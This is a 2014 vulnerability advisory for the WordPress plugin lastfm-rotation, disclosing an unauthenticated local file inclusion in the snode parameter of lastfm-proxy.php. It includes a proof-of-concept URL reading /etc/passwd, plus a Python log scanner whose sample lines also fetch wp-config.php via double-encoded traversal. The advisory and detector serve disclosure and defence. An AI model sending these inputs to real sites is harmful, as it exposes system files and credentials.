wp-plugin : lastfm-rotation

Plugin Details
Plugin Name: wp-plugin : lastfm-rotation
Affected Version : 1 (and most probably lower versions, if any)
Vulnerability : Local File Inclusion
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :

http://localhost/wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd

Vulnerable Parameter : snode
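The PoC above passes an absolute filesystem path in the snode parameter of lastfm-proxy.php. A site operator who cannot update immediately will want to know whether that parameter has been abused in the past, so the following Python script, added here as an example and not part of the advisory or the plugin, scans web server access logs (combined log format) for requests to the proxy script whose snode value is an absolute path, a directory traversal sequence, a null byte, or a stream wrapper/URL. The log lines embedded in it are constructed samples, and the plugin path is taken from the PoC; the legitimate value "weeklyalbumchart" is an assumption used only as a benign contrast. The check decodes the value repeatedly so that double-encoded traversal (..%252F) is not missed. The durable fix on the plugin side is for the proxy to map snode to a fixed allowlist of Last.fm API methods rather than using it as a path.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/nginx "combined" log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [28/May/2014:10:01:02 +0000] "GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=weeklyalbumchart HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.11 - - [28/May/2014:10:01:09 +0000] "GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1" 200 1745 "-" "curl/7.35.0"
203.0.113.12 - - [28/May/2014:10:02:31 +0000] "GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=..%252F..%252Fwp-config.php HTTP/1.1" 200 2201 "-" "python-requests/2.2"
203.0.113.13 - - [28/May/2014:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Script path from the advisory's PoC; the vulnerable parameter is "snode".
TARGET_PATH = "/wp-content/plugins/lastfm-rotation/lastfm-proxy.php"
PARAM = "snode"

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double encoding cannot hide a path."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def snode_reason(value):
    """Return why a snode value looks like file inclusion abuse, or None if benign."""
    v = decode_fully(value)
    if "\x00" in v:
        return "null byte"
    if v.startswith("/") or v.startswith("\\"):
        return "absolute path"
    if TRAVERSAL_RE.search(v):
        return "directory traversal"
    if WRAPPER_RE.match(v):
        return "stream wrapper/URL"
    return None


def scan_log(text):
    """Scan access-log text; return one finding per suspicious snode value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line in the expected format
        parts = urlsplit(m.group("target"))
        if parts.path != TARGET_PATH:
            continue  # only the vulnerable proxy script is of interest
        for val in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            reason = snode_reason(val)
            if reason:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": m.group("status"),
                    "snode": val,
                    "decoded": decode_fully(val),
                    "reason": reason,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} "
              f"{f['reason']}: {f['decoded']!r}")
```

A 200 status on a flagged request is the signal that matters: the proxy answered, so the file contents may have been returned. Feed real logs in with `scan_log(open(path).read())`; the regex expects the standard combined format, so adjust LOG_RE if the server writes a custom format.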


Disclosure Timeline
Vendor Contacted : 2014-02-19
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number :
Plugin Description :
[| Last.fm Rotation will display the covers for the albums you have had in heavy rotation over the last week. It uses the Last.fm API via AJAX to fetch the data and includes a functional (albeit crude) caching mechanism to improve performance. You can make sure Last.fm gets updated with music played from different sources by utilizing one of the many scrobbler plugins available. For example, I use Rhapsody for music streaming, and therefore decided to use Rhobbler to make sure that Last.fm has a complete profile on my listening habits. Please send feedback, enhancement requests, bug details or any questions about installation to dfederighi@yahoo.com ]